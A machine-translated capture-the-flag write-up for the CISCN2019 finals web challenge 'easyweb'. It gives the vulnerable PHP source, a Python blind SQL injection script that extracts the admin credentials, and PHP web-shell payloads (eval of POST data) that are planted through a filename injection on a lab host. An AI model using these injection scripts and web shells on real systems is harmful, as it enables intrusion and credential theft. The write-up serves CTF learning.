[ciscn2019 finals Day2 web1]easyweb

[CISCN2019 The NBA finals Day2 Web1]Easyweb

Casually enter the account password and find that there is no change except for the picture , I didn't log in ,f12 View source code , Found out image.php

If you look directly at image.php Words , Just enlarge the picture ,dirsearch Scan and find robots.txt

Check and find out .php.bak Backup file

Associated with the image.php, So check （/image.php.bak）, Results download the source code and get

<?php
include "config.php";

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

One of them addslashes function ：

addslashes() Function returns a string with a backslash before a predefined character .

The predefined characters are ：

• Single quotation marks （'）
• Double quotes （"）
• The backslash （\）
• NULL

Tips ： This function can be used to prepare strings for strings stored in the database and database query statements .

notes ： By default ,PHP For all the GET、POST and COOKIE Data runs automatically addslashes(). So you should not use... For escaped strings addslashes(), Because this will lead to double escape . In this case, you can use the function get_magic_quotes_gpc() To test .

for example ：

In every double quote （"） Add backslash before ：

<?php
　　$str = addslashes('Shanghai is the "biggest" city in China.');
　　echo($str);
?>
 Operation example ：
Shanghai is the \"biggest\" city in China.

Be careful php Given in the code ：select * from images where id='{$id}' or path='{$path}', as well as str_replace function , We can only use escape characters \ Or single quotation marks destroy themselves , But if you use single quotation marks, they will be replaced , So you can only use \,str_replace The first parameter is \\0, If we introduce \0, First, he will pass addslashes The function becomes \\0, This time is passing str_replace The function becomes \. structure payload：

image.php?id=\0&path=%20or%20ascii(substr((select(database())),1,1))>1%23

Then the script boy rushed out , Online search script ：

import requests
import time
def exp(url_format,length=None):
    rlt = ''
    url  = url_format
    if length==None:
        length = 30
    for l in range(1,length+1):
        begin = 32
        ends = 126
        tmp = (begin+ends)//2
        while begin<ends:
            r = requests.get(url.format(l,tmp))
            if r.content!=b'':
                begin = tmp+1
                tmp = (begin+ends)//2
            else:
                ends = tmp
                tmp = (begin+ends)//2
        if tmp == 32:
            break
        rlt+=chr(tmp)
        print(rlt)
    return rlt.rstrip()
url ='http://69242336-234d-4e49-80a5-6f2b1d9ec930.node4.buuoj.cn:81/image.php?id=\\0&path=or%20ord(substr(database(),{},1))>{}%23'
print(' The database name is ：',exp(url))
url ='http://69242336-234d-4e49-80a5-6f2b1d9ec930.node4.buuoj.cn:81/image.php?id=\\0&path=or%20ord(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x636973636e66696e616c),{},1))>{}%23'
print(' Table, ：',exp(url))
url ='http://69242336-234d-4e49-80a5-6f2b1d9ec930.node4.buuoj.cn:81/image.php?id=\\0&path=or%20ord(substr((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=0x636973636e66696e616c and table_name=0x7573657273),{},1))>{}%23'
print(' Column name is ：',exp(url))
url ='http://69242336-234d-4e49-80a5-6f2b1d9ec930.node4.buuoj.cn:81/image.php?id=\\0&path=or%20ord(substr((select%20group_concat(username)%20from%20users),{},1))>{}%23'
print(' The user is called ：',exp(url))
url ='http://69242336-234d-4e49-80a5-6f2b1d9ec930.node4.buuoj.cn:81/image.php?id=\\0&path=or%20ord(substr((select%20group_concat(password)%20from%20users),{},1))>{}%23'
print(' The password for ：',exp(url))

Burst out ： The database name is ： ciscnfinal    Table, ： images,users    Column name is ： username,password    The user is called ： admin    The password for ： 5a8fdc3b65d3f811e452

Then login directly with your account and password , After successful login, there is a button to upload files

It should be a file upload vulnerability , Because the source code says upload image/jpeg, Choose a picture to upload at will , Found can be uploaded , And upload successfully , So I wrote a txt The content is ：

GIF89a
<script language="php">
eval($_POST['hack']);
</script>

Change suffix to png Post upload , Upload successful , And gave the path

Ant sword connection , But it can't be loaded , It means that this is wrong ,bp Grab the bag and find filename

Because the user name can only be admin Can't use , So consider file name injection , Short tags can be used to bypass ：

<[email protected]($_POST['hack']);?>, You can echo the path after contracting

  Ant sword connection url：http://xxxxx.buuoj.cn:81/logs/upload.76310c6b13ee5020f251ac849a1686ee.log.php

  Under the root directory is flag